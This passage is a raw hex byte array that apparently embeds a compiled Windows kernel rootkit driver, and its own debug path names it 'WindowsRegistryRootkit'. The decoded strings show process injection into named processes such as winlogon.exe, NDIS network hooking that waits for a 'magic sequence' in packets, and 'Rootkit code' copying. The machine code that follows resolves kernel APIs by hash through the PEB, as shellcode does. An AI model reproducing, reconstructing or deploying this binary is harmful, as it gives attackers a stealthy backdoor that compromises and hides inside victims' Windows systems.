0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x4e,0x61,0x6d,0x65,0x28, 0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20, 0x74,0x6f,0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20, 0x22,0x25,0x77,0x73,0x22,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x49,0x64,0x28,0x29,0x20, 0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f, 0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x50,0x49, 0x44,0x3d,0x25,0x64,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x3a,0x20,0x55,0x6e,0x6b,0x6e,0x6f,0x77,0x6e,0x20,0x4e,0x54,0x20,0x76,0x65,0x72, 0x73,0x69,0x6f,0x6e,0x0a,0x00,0x00,0x00,0x4e,0x74,0x50,0x72,0x6f,0x74,0x65,0x63, 0x74,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29, 0x20,0x53,0x44,0x54,0x20,0x6e,0x75,0x6d,0x62,0x65,0x72,0x20,0x69,0x73,0x20,0x30, 
0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52, 0x4f,0x52,0x3a,0x20,0x4e,0x44,0x49,0x53,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e, 0x20,0x30,0x78,0x25,0x78,0x20,0x69,0x73,0x20,0x6e,0x6f,0x74,0x20,0x73,0x75,0x70, 0x70,0x6f,0x72,0x74,0x65,0x64,0x0a,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x54,0x00,0x43,0x00,0x50,0x00,0x49,0x00,0x50,0x00,0x00,0x00,0x4e,0x64,0x69,0x73, 0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x22,0x54,0x43,0x50,0x49, 0x50,0x22,0x20,0x70,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20,0x61,0x64,0x64,0x72, 0x65,0x73,0x73,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00, 0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x4f, 0x70,0x65,0x6e,0x20,0x62,0x6c,0x6f,0x63,0x6b,0x20,0x3d,0x20,0x30,0x78,0x25,0x2e, 0x38,0x78,0x2c,0x20,0x4d,0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x20,0x3d,0x20,0x30, 0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x69,0x6e,0x67,0x20,0x4d, 0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x44,0x70,0x63,0x3a,0x20,0x30,0x78,0x25,0x2e, 0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00, 0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x20,0x45,0x52, 0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x66, 0x69,0x6e,0x64,0x20,0x22,0x54,0x43,0x50,0x49,0x50,0x22,0x20,0x70,0x72,0x6f,0x74, 0x6f,0x63,0x6f,0x6c,0x0a,0x00,0x00,0x00,0x25,0x64,0x2e,0x25,0x64,0x2e,0x25,0x64, 0x2e,0x25,0x64,0x00,0x00,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00,0x6c,0x00, 0x6f,0x00,0x67,0x00,0x6f,0x00,0x6e,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x20,0x49, 
0x50,0x3a,0x20,0x46,0x72,0x6f,0x6d,0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x54,0x6f, 0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20, 0x3d,0x20,0x25,0x64,0x2c,0x20,0x4c,0x65,0x6e,0x67,0x74,0x68,0x20,0x3d,0x20,0x25, 0x64,0x0a,0x00,0x00,0x52,0x4b,0x43,0x54,0x4c,0x3a,0x37,0x43,0x35,0x45,0x33,0x33, 0x38,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x3a,0x20, 0x4d,0x61,0x67,0x69,0x63,0x20,0x73,0x65,0x71,0x75,0x65,0x6e,0x63,0x65,0x20,0x68, 0x61,0x73,0x20,0x62,0x65,0x65,0x6e,0x20,0x66,0x69,0x6e,0x64,0x20,0x69,0x6e,0x20, 0x6e,0x65,0x74,0x77,0x6f,0x72,0x6b,0x20,0x70,0x61,0x63,0x6b,0x65,0x74,0x21,0x0a, 0x00,0x00,0x00,0x00,0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74, 0x65,0x6d,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73, 0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x44,0x72,0x69,0x76, 0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x43,0x6f,0x6e,0x74,0x69,0x6e,0x75,0x65,0x54, 0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x50,0x61,0x72,0x61,0x6d,0x20,0x3d, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69, 0x6c,0x73,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74, 0x72,0x79,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x65,0x64,0x20,0x64,0x72,0x69, 0x76,0x65,0x72,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x73,0x20,0x30,0x78,0x25,0x2e, 0x38,0x78,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74, 0x72,0x79,0x28,0x29,0x3a,0x20,0x53,0x74,0x61,0x72,0x74,0x20,0x61,0x64,0x64,0x72, 0x65,0x73,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00, 0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68, 0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a,0x20,0x30,0x78, 
0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x48,0x6f,0x6f,0x6b,0x49,0x6d,0x61,0x67, 0x65,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20, 0x65,0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x68,0x6f,0x6f,0x6b, 0x65,0x64,0x20,0x28,0x30,0x78,0x25,0x2e,0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x29,0x0a,0x00,0x00,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00, 0x25,0x64,0x20,0x66,0x72,0x65,0x65,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x5c,0x00,0x48,0x00, 0x54,0x00,0x54,0x00,0x50,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00, 0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x2e,0x00, 0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00, 0x73,0x00,0x6d,0x00,0x62,0x00,0x31,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00, 0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00, 0x62,0x00,0x32,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00, 0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00, 0x00,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x32,0x00,0x2e,0x00, 0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x65,0x00,0x63,0x00, 0x64,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00, 0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x28, 0x29,0x3a,0x20,0x27,0x25,0x77,0x5a,0x27,0x20,0x69,0x73,0x20,0x61,0x74,0x20,0x30, 0x78,0x25,0x2e,0x38,0x78,0x2c,0x20,0x73,0x69,0x7a,0x65,0x3d,0x25,0x64,0x0a,0x00, 0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x4c, 0x6f,0x61,0x64,0x65,0x64,0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a, 0x00,0x00,0x00,0x00,0x52,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x20,0x63,0x6f,0x64,0x65, 0x3a,0x20,0x30,0x78,0x25,0x78,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x66,0x72,0x6f, 
0x6d,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x50,0x73,0x53,0x65, 0x74,0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79, 0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69, 0x6c,0x73,0x0a,0x00,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53,0x79,0x73,0x74,0x65, 0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x28,0x29,0x20,0x66, 0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00, 0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00, 0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00, 0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00, 0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x61,0x00,0x63,0x00,0x70,0x00, 0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00, 0x6c,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x63,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00, 0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x73,0x00, 0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00, 0x6c,0x00,0x61,0x00,0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00, 0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00, 0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00, 0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00,0x6b,0x00,0x72,0x00, 0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00, 0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x70,0x00,0x61,0x00, 0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00, 
0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00, 0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00, 0x70,0x00,0x61,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00, 0x00,0x00,0x00,0x00,0x6e,0x74,0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65, 0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69, 0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a,0x20,0x4b,0x65,0x72,0x6e,0x65,0x6c,0x20, 0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00, 0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73,0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74, 0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a, 0x20,0x4e,0x44,0x49,0x53,0x20,0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73, 0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69, 0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55, 0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x6c,0x6f,0x63,0x61,0x74,0x65,0x20, 0x4e,0x44,0x49,0x53,0x0a,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xc0,0x2d,0x00,0x10,0x20,0x0f,0x00,0x10,0x01,0x00,0x00,0x00, 0x52,0x53,0x44,0x53,0x30,0xf9,0x23,0x4b,0x06,0x74,0x2c,0x46,0x98,0xa0,0x13,0x7b, 0x60,0xd0,0x84,0xd2,0x03,0x00,0x00,0x00,0x78,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f, 0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c, 0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52, 0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x72,0x6f,0x6f,0x74,0x6b, 
0x69,0x74,0x5f,0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e, 0x70,0x64,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x2a,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x55,0x8b,0xec,0x5d,0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x7c,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x0a,0xa1, 0xc8,0x2d,0x00,0x10,0xe9,0xd8,0x00,0x00,0x00,0xc7,0x45,0x84,0x00,0x00,0x00,0x00, 0x6a,0x6c,0x6a,0x00,0x8d,0x45,0x90,0x50,0xe8,0x81,0x1b,0x00,0x00,0x83,0xc4,0x0c, 0xc6,0x45,0x90,0x05,0xc6,0x45,0x91,0x00,0xc7,0x45,0x98,0x40,0x0f,0x00,0x10,0xc7, 
0x45,0x9c,0x70,0x0f,0x00,0x10,0xc7,0x45,0xa0,0xc0,0x0f,0x00,0x10,0xc7,0x45,0xa4, 0xd0,0x0f,0x00,0x10,0xc7,0x45,0xa8,0x80,0x0f,0x00,0x10,0xc7,0x45,0xac,0x90,0x0f, 0x00,0x10,0xc7,0x45,0xb0,0xe0,0x0f,0x00,0x10,0xc7,0x45,0xb4,0xf0,0x0f,0x00,0x10, 0xc7,0x45,0xb8,0xa0,0x0f,0x00,0x10,0xc7,0x45,0xbc,0xb0,0x0f,0x00,0x10,0xc7,0x45, 0xcc,0x30,0x0f,0x00,0x10,0xc7,0x45,0xd0,0x50,0x0f,0x00,0x10,0xc7,0x45,0xd8,0x60, 0x0f,0x00,0x10,0xc7,0x45,0xc8,0x00,0x10,0x00,0x10,0xc7,0x45,0xd4,0x10,0x10,0x00, 0x10,0x68,0x9c,0x03,0x00,0x10,0x8d,0x4d,0x88,0x51,0xff,0x15,0x20,0x03,0x00,0x10, 0x8b,0x55,0x88,0x89,0x55,0xc0,0x8b,0x45,0x8c,0x89,0x45,0xc4,0x6a,0x6c,0x8d,0x4d, 0x90,0x51,0x68,0xc8,0x2d,0x00,0x10,0x8d,0x55,0x84,0x52,0xff,0x15,0x84,0x02,0x00, 0x10,0x83,0x7d,0x84,0x00,0x74,0x15,0x8b,0x45,0x84,0x50,0x68,0xb4,0x03,0x00,0x10, 0xe8,0xbd,0x1a,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0xeb,0x05,0xa1,0xc8,0x2d,0x00, 0x10,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x21,0xc7,0x45,0xfc, 0x00,0x00,0x00,0x00,0xa1,0xc8,0x2d,0x00,0x10,0x50,0x8d,0x4d,0xfc,0x51,0xff,0x15, 0x80,0x02,0x00,0x10,0xc7,0x05,0xc8,0x2d,0x00,0x10,0x00,0x00,0x00,0x00,0x8b,0xe5, 0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0x60,0xe8,0x00,0x00,0x00,0x00,0x5b,0x81,0xeb,0x8c, 0x11,0x00,0x10,0xe8,0x6f,0x00,0x00,0x00,0x8b,0xf0,0x68,0xe8,0x60,0xbf,0x04,0x56, 0xe8,0x84,0x00,0x00,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8b,0x3e,0x13,0x00,0x10,0x51, 0xff,0xd0,0x8b,0xf0,0x68,0x89,0xfd,0x12,0xa4,0x56,0xe8,0x6a,0x00,0x00,0x00,0x89, 0x45,0xfc,0x68,0x84,0x9b,0x50,0xf2,0x56,0xe8,0x5c,0x00,0x00,0x00,0x89,0x45,0xf4, 0xff,0x75,0xf4,0xff,0x75,0xfc,0x8b,0x45,0x08,0x50,0xe8,0xa3,0x00,0x00,0x00,0x89, 0x45,0xf8,0x61,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0x55,0x8b,0xec,0x8b, 0x45,0x08,0x52,0x33,0xd2,0xc1,0xc2,0x03,0x32,0x10,0x40,0x80,0x38,0x00,0x75,0xf5, 
0x8b,0xc2,0x5a,0x5d,0xc2,0x04,0x00,0x56,0x33,0xc0,0x64,0xa1,0x30,0x00,0x00,0x00, 0x78,0x0c,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad,0x8b,0x40,0x08,0xeb,0x09,0x8b,0x40, 0x34,0x8d,0x40,0x7c,0x8b,0x40,0x3c,0x5e,0xc3,0x55,0x8b,0xec,0x53,0x56,0x57,0x33, 0xc0,0x8b,0x5d,0x0c,0x8b,0x75,0x08,0x8b,0xfe,0x03,0x76,0x3c,0x8b,0x4e,0x78,0x03, 0xcf,0x8b,0x51,0x1c,0x52,0x8b,0x51,0x24,0x52,0x8b,0x71,0x20,0x03,0xf7,0x99,0x4a, 0xad,0x42,0x03,0x45,0x08,0x50,0xe8,0x91,0xff,0xff,0xff,0x3b,0xc3,0x75,0xf1,0x8b, 0x45,0x08,0x92,0x5e,0x03,0xf2,0xd1,0xe0,0x03,0xc6,0x33,0xc9,0x0f,0xb7,0x08,0x5f, 0xc1,0xe1,0x02,0x03,0xca,0x03,0xcf,0x8b,0x01,0x03,0xc2,0x5f,0x5e,0x5b,0x5d,0xc2, 0x08,0x00,0x55,0x8b,0xec,0x83,0xec,0x10,0x53,0x8b,0x5d,0x08,0x85,0xdb,0x56,0x57, 0x0f,0x84,0xa4,0x00,0x00,0x00,0x8b,0x43,0x3c,0x8b,0xbc,0x18,0x80,0x00,0x00,0x00, 0x03,0xfb,0xe9,0x80,0x00,0x00,0x00,0x8b,0x47,0x0c,0x03,0xc3,0x89,0x45,0xfc,0xff, 0x75,0xfc,0xff,0x55,0x0c,0x89,0x45,0x08,0x83,0x7d,0x08,0x00,0x74,0x7c,0x83,0x7f, 0x04,0xff,0x75,0x04,0x8b,0x07,0xeb,0x03,0x8b,0x47,0x10,0x89,0x45,0xfc,0x8d,0x34, 0x18,0xeb,0x4c,0x8b,0x06,0xa9,0x00,0x00,0x00,0xf0,0x74,0x19,0x25,0xff,0xff,0x00, 0x00,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff,0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf4, 0x8b,0x45,0xf4,0xeb,0x16,0x8d,0x44,0x18,0x02,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff, 0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf0,0x8b,0x45,0xf0,0x85,0xc0,0x89,0x06,0x74, 0x29,0x8b,0x47,0x10,0x2b,0x45,0xfc,0x8b,0x0e,0x89,0x0c,0x30,0x83,0xc6,0x04,0x83, 0x3e,0x00,0x75,0xaf,0x83,0xc7,0x14,0x83,0x3f,0x00,0x0f,0x85,0x77,0xff,0xff,0xff, 0x33,0xc0,0x40,0x5f,0x5e,0x5b,0xc9,0xc2,0x0c,0x00,0x33,0xc0,0xeb,0xf5,0x6b,0x65, 0x72,0x6e,0x65,0x6c,0x33,0x32,0x00,0x7e,0x45,0x4e,0x44,0xcc,0xcc,0xcc,0xcc,0xcc, 0x83,0x3d,0xdc,0x2d,0x00,0x10,0x00,0x74,0x0e,0xa1,0xdc,0x2d,0x00,0x10,0x8d,0x54, 0x24,0x04,0xcd,0x2e,0xc2,0x14,0x00,0xb8,0x01,0x00,0x00,0x00,0xc2,0x14,0x00,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08, 
0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x81,0x39,0x7e,0x45,0x4e,0x44,0x74,0x14,0x8b,0x55, 0xfc,0x83,0xc2,0x01,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x83,0xc0,0x01,0x89,0x45,0xf8, 0xeb,0xe1,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x68,0xe4,0x03,0x00,0x10,0xe8,0x25,0x18,0x00,0x00,0x83,0xc4,0x04, 0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00,0x10,0xff,0x15,0xd4,0x02,0x00,0x10,0x5d, 0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x18,0xc6,0x45,0xf7,0x00,0x83,0x7d,0x08,0x00,0x74,0x0e, 